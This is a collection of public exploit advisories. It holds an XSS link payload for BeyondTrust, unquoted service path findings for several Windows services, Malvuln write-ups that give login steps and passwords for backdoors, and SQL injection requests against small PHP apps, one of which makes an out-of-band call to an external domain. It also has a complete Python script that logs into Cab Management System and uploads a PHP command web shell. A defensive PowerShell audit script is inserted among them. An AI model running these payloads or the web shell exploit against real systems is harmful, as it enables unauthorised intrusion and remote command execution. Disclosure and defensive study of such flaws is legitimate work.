<pre><code># Exploit Title: BeyondTrust Remote Support - Reflected Cross-Site Scripting (XSS) (Unauthenticated)<br /># Google Dork: intext:"BeyondTrust" "Redistribution Prohibited"<br /># Date: 30/12/2021<br /># Exploit Author: Malcrove<br /># Vendor Homepage: https://www.beyondtrust.com/<br /># Version: v6.0 and earlier versions<br /># CVE: CVE-2021-31589<br /><br />Summary:<br /><br />An unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allows remote attackers to inject arbitrary web script or HTML. Remote attackers could achieve full admin access to the appliance by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.<br /><br /><br />Vulnerability Details:<br /><br />Affected Endpoint: /appliance/login<br />Affected Parameter: login[password]<br />Request Method: GET or POST<br /><br /><br />Proof of concept (PoC):<br /><br />Opening the link below in a modern web browser fires the alert(document.domain) JavaScript call in the context of the BeyondTrust Remote Support domain.<br /><br />http://<bomgar-host>/appliance/login?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password<br /><br /><br />Mitigation:<br /><br />A fix has been released by the vendor in NSBase 6.1. It is recommended to update the vulnerable appliance base version to the latest version.<br /><br />- Timeline:<br /><br /> April 6, 2021: Vulnerability advisory sent to the vendor (BeyondTrust)<br /> April 8, 2021: Received an initial reply from the vendor<br /> Jun 10, 2021: The vendor released a fix for the vulnerability in NSBase 6.1<br /> Dec 30, 2021: Responsible public disclosure<br /><br /><br />- Credits<br />Ahmed Aboul-Ela (Malcrove)<br /></code></pre>
<pre><code># Exploit Title: HMA VPN 5.3 - Unquoted Service Path<br /># Date: 18/02/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.hidemyass.com/<br /># Software Link: https://www.hidemyass.com/en-us/downloads<br /># Version: 5.3.5913.0<br /># Tested: Windows 10 Pro x64 es<br /><br /><br />C:\Users\saudh>sc qc HmaProVpn<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: HmaProVpn<br /> TYPE : 20 WIN32_SHARE_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files\Privax\HMA VPN\VpnSvc.exe"<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : HMA VPN<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/b125a9a083447ad7d437e3e7f3ed5325_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wollf.m<br />Vulnerability: Authentication Bypass<br />Description: The malware listens on TCP port 55555 and runs with SYSTEM integrity. The malware has an FTP component that can be enabled using the FTPD command. Third-party attackers who can reach the server can log on using any username/password combination.<br />Type: PE32<br />MD5: b125a9a083447ad7d437e3e7f3ed5325<br />Vuln ID: MVID-2021-0436<br />Dropped files: wrm.exe<br />Disclosure: 12/31/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 21<br />220 Welcome to X-Ftp server ...<br />USER malvuln<br />331 User name okay, need password.<br />PASS malvuln<br />230 User logged in, proceed.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path<br /># Discovery by: Johto Robbie<br /># Discovery Date: May 12, 2021<br /># Tested Version: 2.52.13001.0<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Windows 10 x64 Home<br /><br /># Steps to discover the Unquoted Service Path:<br /><br />Go to Start and type cmd. Enter the following command and press Enter:<br /><br />C:\Users\Bang's>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\" | findstr /i /v """<br /><br />Gaming Services    GamingServices     C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe     Auto<br />Gaming Services    GamingServicesNet  C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe  Auto<br /><br />C:\Users\Bang's>sc qc "GamingServices"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: GamingServices<br /> TYPE : 210 WIN32_PACKAGED_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Gaming Services<br /> DEPENDENCIES : staterepository<br /> SERVICE_START_NAME : LocalSystem<br /><br />This service's binary path has no quotes, and it is contained in C:\Program Files. Put a malicious application with the name "program.exe" in place, then stop and start GamingServices: "program.exe" will be executed.<br /><br />#Exploit:<br /><br />An unquoted service path in Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe could lead to privilege escalation during the installation process that is performed when an executable file is registered. This could further lead to complete compromise of confidentiality, integrity and availability.<br /><br />#Timeline<br />May 12, 2021 - Reported to Microsoft<br />Feb 11, 2022 - Confirmed vulnerability has been fixed<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/b125a9a083447ad7d437e3e7f3ed5325.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wollf.m<br />Vulnerability: Weak Hardcoded Password<br />Description: The malware listens on TCP port 55555 and runs with SYSTEM integrity. Authentication is required for remote user access. However, the password "alfaromeo" is weak and hardcoded within the executable and appears many times in a database of leaked passwords.<br />Type: PE32<br />MD5: b125a9a083447ad7d437e3e7f3ed5325<br />Vuln ID: MVID-2021-0435<br />Dropped files: wrm.exe<br />Disclosure: 12/31/2021 <br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 55555<br /><br />login: alfaromeo<br /><br />Login succeed!<br /><br />"Wollf Remote Manager" v1.6<br />Code by wollf, http://www.xfocus.org<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#help<br /><br />DOS Switch to MS-DOS prompt<br />DIR/LS/LIST Directory and file list<br />CD Entry directory<br />MD/MKDIR Make directory<br />PWD Get current dirctory<br />COPY/CP Copy file<br />DEL/RM Delete directory/file<br />REN/RENAME Rename file<br />MOVE/MV Move file<br />TYPE/CAT Type text file<br /><br />POPMSG Popup message box<br />SYSINFO Get system information<br />WHO/W Get current connections<br /><br />SHELL Execute command by system shell(cmd.exe)<br />EXEC/RUN Execute file by windows API(WinExec)<br />WS Windows list<br />PS Process list<br />KILL Kill process<br /><br />GET/GETFILE Download file from remote machine<br />PUT/PUTFILE Upload file to remote machine<br />WGET Get file from web server<br />FGET Get file from ftp server<br />FPUT Put file to ftp server<br />TELNET Connect to other host<br /><br />FTPD Start ftp service<br />TELNETD/TELD/EXPORT Start telnet service (export shell)<br /><br />REDIR Redirect tcp data from <Port> to <Dest_host:Dest_port><br />REDIR_STOP Stop redirect tcp data<br 
/>SNIFF Sniff ftp/smtp/pop3/http password what via ethernet<br />SNIFF_STOP Stop ethernet sniffer<br />KEYLOG Start keyboard record<br />KEYLOG_STOP Stop keyboard record<br /><br />REBOOT Reboot windows<br />SHUTDOWN Shutdown windows<br />EXIT Close current connection<br />QUIT Close all connection and abort service<br />REMOVE Remove service<br />VER/VERSION Version information<br />HELP/H/? Show help message<br /><br />Type "HELP | MORE" for multipage display.<br /><br />Command "HELP" succeed.<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#<br /></code></pre>
<pre><code># Exploit Title: Cab Management System 1.0 - 'id' SQLi (Authenticated)<br /># Exploit Author: Alperen Ergel<br /># Contact: @alpernae (IG/TW)<br /># Software Homepage: https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html<br /># Version : 1.0<br /># Tested on: Windows 10 XAMPP | Kali Linux<br /># Category: WebApp<br /># Google Dork: N/A<br /># Date: 18.02.2022<br />######## Description ########<br />#<br /># Authenticate, then open the client update settings page; the id<br /># parameter shown there is injectable. Put the payload in that parameter.<br />#<br />######## Proof of Concept ########<br /><br />========>>> REQUEST <<<=========<br /><br />GET /cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1<br />Host: localhost<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: PHPSESSID=m1s7h9jremg0vj7ipk9m05n1nt<br />Connection: close<br /><br /></code></pre>
<pre><code># Exploit Title: TRIGONE Remote System Monitor 3.61 Unquoted Service Path<br /># Discovery by: Yehia Elghaly<br /># Date: 30-12-2021<br /># Vendor Homepage: https://www.trigonesoft.com/<br /># Software Link: https://www.trigonesoft.com/download/Remote_System_monitor_Server_3.61_x86_Setup.exe<br /># Tested Version: 3.61<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on: Windows 7 x86 - Windows Server 2016 x64<br /><br /># Steps to discover the Unquoted Service Path:<br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"<br />|findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />TRIGONE Remote System Monitor Server RemoteSystemMonitorService <br />C:\Program Files\TRIGONE\Remote System Monitor Server\RemoteSystemMonitorService.exe <br />Auto<br /><br />C:\>sc qc srvInventoryWebServer<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: RemoteSystemMonitorService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files\TRIGONE\Remote System Monitor Serv<br />er\RemoteSystemMonitorService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : TRIGONE Remote System Monitor Server<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /></code></pre>
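The HMA VPN, Microsoft Gaming Services and TRIGONE advisories above all rely on the same manual wmic/sc check. The PowerShell script below is an added example, not code from any of those advisories: it runs the same check against every service on the host and prints, or with -Fix applies, the quoted binary path that removes the ambiguity. It assumes an elevated session and that service binaries end in .exe.

```powershell
# Added audit script (not from any advisory on this page). Lists services whose
# BINARY_PATH_NAME is unquoted and contains a space, outside %SystemRoot%, and
# prints the quoted path that fixes each one. With -Fix it writes that path to the
# service's ImagePath registry value (needs an elevated session).
[CmdletBinding()]
param(
    [switch]$Fix   # report only unless -Fix is given
)

function Get-UnquotedServicePath {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if ([string]::IsNullOrWhiteSpace($path)) { continue }
        if ($path.StartsWith('"')) { continue }                 # already quoted, safe
        # Split the executable (up to the first ".exe") from any arguments.
        # Assumption: the service binary ends in .exe; other paths are skipped.
        if (-not ($path -match '^(?<exe>.*?\.exe)(?<rest>.*)$')) { continue }
        $exe  = $Matches.exe
        $rest = $Matches.rest
        if ($exe -notmatch ' ') { continue }                    # no space, no ambiguity
        if ($exe -like "$env:SystemRoot\*") { continue }        # same filter as the wmic one-liner
        [pscustomobject]@{
            Name      = $svc.Name
            StartMode = $svc.StartMode
            RunsAs    = $svc.StartName                          # LocalSystem is the worst case
            PathName  = $path
            FixedPath = ('"{0}"{1}' -f $exe, $rest)             # quoted exe, arguments kept
        }
    }
}

$findings = @(Get-UnquotedServicePath)
if ($findings.Count -eq 0) {
    Write-Host 'No unquoted service paths found.'
    return
}

$findings | Format-Table Name, StartMode, RunsAs, PathName -AutoSize

foreach ($f in $findings) {
    # ImagePath is what the Service Control Manager reads; sc config binPath= writes the same value.
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($f.Name)"
    if ($Fix) {
        Set-ItemProperty -Path $key -Name ImagePath -Value $f.FixedPath
        Write-Host ("Fixed {0}: {1}" -f $f.Name, $f.FixedPath)
    } else {
        Write-Host ("{0} -> set ImagePath to {1}" -f $f.Name, $f.FixedPath)
    }
}
```

The change to ImagePath takes effect the next time the service starts, so restart each fixed service (or reboot) and re-run the script to confirm the list is empty.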
<pre><code># Exploit Title: Cab Management System 1.0 - Remote Code Execution (RCE) (Authenticated)<br /># Exploit Author: Alperen Ergel<br /># Contact: @alpernae (IG/TW)<br /># Software Homepage: https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html<br /># Version : 1.0<br /># Tested on: Windows 10 XAMPP | Kali Linux<br /># Category: WebApp<br /># Google Dork: N/A<br /># Date: 18.02.2022<br />######## Description ########<br />#<br /># Step 1: Log in to the admin account and go to the site settings.<br /># Step 2: Update the web site icon and select a webshell.php.<br /># Step 3: Upload the webshell; that's it.<br />#<br />######## Proof of Concept ########<br /><br />========>>> START REQUEST <<<=========<br /><br />POST /cms/classes/SystemSettings.php?f=update_settings HTTP/1.1<br />Host: localhost<br />Content-Length: 11338<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"<br />Accept: */*<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc5vp1oayEolowCbb<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/cms/admin/?page=system_info<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: PHPSESSID=samlsgsrh4iq50eqc1qldpthml<br />Connection: close<br /><br /><br /><-- SNIPP HERE --><br />------WebKitFormBoundaryc5vp1oayEolowCbb<br />Content-Disposition: form-data; name="img"; filename="shell.php"<br />Content-Type: application/octet-stream<br /><br /><?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?><br />------WebKitFormBoundaryc5vp1oayEolowCbb<br />Content-Disposition: 
form-data; name="cover"; filename=""<br />Content-Type: application/octet-stream<br />------WebKitFormBoundaryc5vp1oayEolowCbb--<br /><-- SNIPP HERE --><br /><br />========>>> END REQUEST <<<=========<br /><br /><br />========>>> EXPLOIT CODE <<<=========<br /><br /><br />import requests<br />print("""<br />--------------------------------------------<br />| |<br />| Author: Alperen Ergel (@alpernae) |<br />| | <br />| CAB Management System v1 Exploit |<br />| |<br />--------------------------------------------<br />""")<br />username = input("Username: ")<br />password = input("Password: ")<br />URL = input("Domain: ")<br /><br />burp0_url = "http://" + URL + "/cms/classes/Login.php?f=login"<br />burp0_headers = {"sec-ch-ua": "\"(Not(A:Brand\";v=\"8\", \"Chromium\";v=\"98\"", "Accept": "*/*", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36", "sec-ch-ua-platform": "\"Windows\"", "Origin": "http://192.168.1.33", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://192.168.1.33/cms/admin/login.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}<br />burp0_data = {"username": username, "password": password}<br />requests.post(burp0_url, headers=burp0_headers, data=burp0_data)<br /><br /><br />FILE = input("File: ")<br /><br />burp0_url = "http://" + URL + "/cms/classes/SystemSettings.php?f=update_settings"<br />burp0_headers = {"sec-ch-ua": "\"(Not(A:Brand\";v=\"8\", \"Chromium\";v=\"98\"", "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryc5vp1oayEolowCbb", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36", "sec-ch-ua-platform": "\"Windows\"", "Origin": "http://localhost", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://localhost/cms/admin/?page=system_info", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}<br />burp0_data = "------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nCab Management System\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nCMS - PHP\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"content[welcome]\"\r\n\r\n<ptest</p>\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"content[about]\"\r\n\r\n<ptest</p>\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + FILE + "\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"cover\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb--\r\n"<br />requests.post(burp0_url, headers=burp0_headers, data=burp0_data)<br /><br /></code></pre>
<pre><code>## Title: Computer and Mobile Repair Shop Management-1.0 SQL - Injections<br />## Author: nu11secur1ty<br />## Date: 12.28.2021<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15108/computer-and-mobile-repair-shop-management-system-using-phpoop-free-source-code.html<br /><br />## Description:<br />The `code` parameter from /rsms/ node app, on Computer and Mobile<br />Repair Shop Management-1.0 appears to be vulnerable to SQL injection<br />attacks.<br />The payload '+(select<br />load_file('\\\\uhf36ut6xyf0s9amr8axy7o8ezks8jwazyqlh96.nu11secur1tyPenetrationTestingEngineer.net\\kie'))+'<br />was submitted in the code parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take administrator account control on this system.<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: code (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=view_status&code=202778'+(select<br />load_file('\\\\uhf36ut6xyf0s9amr8axy7o8ezks8jwazyqlh96.nu11secur1tyPenetrationTestingEngineer.net\\kie'))+''<br />AND (SELECT 6180 FROM (SELECT(SLEEP(3)))nbQu) AND 'yOvj'='yOvj<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/RSMS-1.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/aa69kd)<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/3a505e7ea1beee556860488e34db8da6.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Dsocks.10<br />Vulnerability: Hardcoded Cleartext Password<br />Description: The malware, coded by Drocon, builds and creates backdoor servers; the supplied password is then hardcoded in cleartext in the PE file.<br />Type: PE32<br />MD5: 3a505e7ea1beee556860488e34db8da6<br />Vuln ID: MVID-2022-0496<br />Dropped files: server.exe<br />Disclosure: 02/21/2022<br /></code></pre>